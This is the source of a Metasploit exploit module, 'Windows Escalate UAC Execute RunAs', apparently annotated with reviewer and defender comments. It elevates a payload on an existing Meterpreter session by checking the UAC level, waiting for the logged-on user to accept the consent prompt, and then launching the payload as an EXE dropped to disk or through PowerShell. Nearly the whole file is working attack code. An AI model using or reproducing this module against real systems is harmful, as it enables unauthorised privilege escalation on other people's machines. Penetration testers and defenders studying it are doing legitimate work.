Path: blob/master/modules/exploits/windows/local/ask.rb
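##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Local Windows module that requests elevation for a payload on an existing
# Meterpreter session.
#
# As written here, the module does not suppress the UAC consent dialog: unless
# UAC is disabled or configured not to prompt, the flow depends on the
# logged-on user approving the prompt (see #exploit).
#
# NOTE(review): is_uac_enabled?, get_uac_level, UAC_NO_PROMPT,
# shell_execute_exe and shell_execute_psh are not defined in this file;
# presumably they come from the Post::Windows::Priv and Post::Windows::Runas
# mixins included below -- confirm against those mixins.
class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Post::Windows::Priv
  include Post::Windows::Runas

  # Registers the module metadata and its user-facing options.
  #
  # @param info [Hash] metadata overrides merged in through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Escalate UAC Execute RunAs',
        'Description' => %q{
          This module will attempt to elevate execution level using
          the ShellExecute undocumented RunAs flag to bypass low
          UAC settings.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'mubix', # Original technique
          'b00stfr3ak' # Added powershell option
        ],
        'Platform' => ['win'],
        'SessionTypes' => ['meterpreter'],
        'Targets' => [['Windows', {}]],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2012-01-03',
        # NOTE(review): reliability, stability and side effects are all
        # recorded as unknown. The FILENAME/PATH options suggest the EXE
        # technique leaves a file on disk, which would be a side effect
        # worth recording here -- confirm against the Runas mixin.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options([
      OptString.new('FILENAME', [false, 'File name on disk']),
      OptString.new('PATH', [false, 'Location on disk, %TEMP% used if not set']),
      # Restricted to the two techniques that #exploit dispatches on.
      OptEnum.new('TECHNIQUE', [true, 'Technique to use', 'EXE', %w[PSH EXE]]),
    ])
  end

  # Reports the UAC state to the operator, then launches the payload with the
  # configured technique.
  #
  # Three UAC states are distinguished: disabled, enabled without a prompt,
  # and enabled with a prompt. Only in the last case does the outcome depend
  # on the user accepting the dialog.
  #
  # Defender note: with the EXE technique a file is placed at PATH (or %TEMP%
  # when PATH is unset, per the option text), so an elevation request for a
  # binary in a user-writable temporary directory is the observable event
  # here -- presumably; confirm against shell_execute_exe.
  #
  # @return [void]
  def exploit
    if is_uac_enabled?
      print_status 'UAC is Enabled, checking level...'
      case get_uac_level
      when UAC_NO_PROMPT
        # UAC is enabled on this branch, so the message must not say it is
        # disabled; only the prompt is absent.
        print_good 'UAC is enabled but set to not prompt, no prompt for the user'
      else
        print_status "The user will be prompted, wait for them to click 'Ok'"
      end
    else
      print_good 'UAC is not enabled, no prompt for the user'
    end

    # TECHNIQUE is an OptEnum limited to EXE/PSH, so no fallback branch.
    case datastore['TECHNIQUE']
    when 'EXE'
      shell_execute_exe(datastore['FILENAME'], datastore['PATH'])
    when 'PSH'
      shell_execute_psh
    end
  end
end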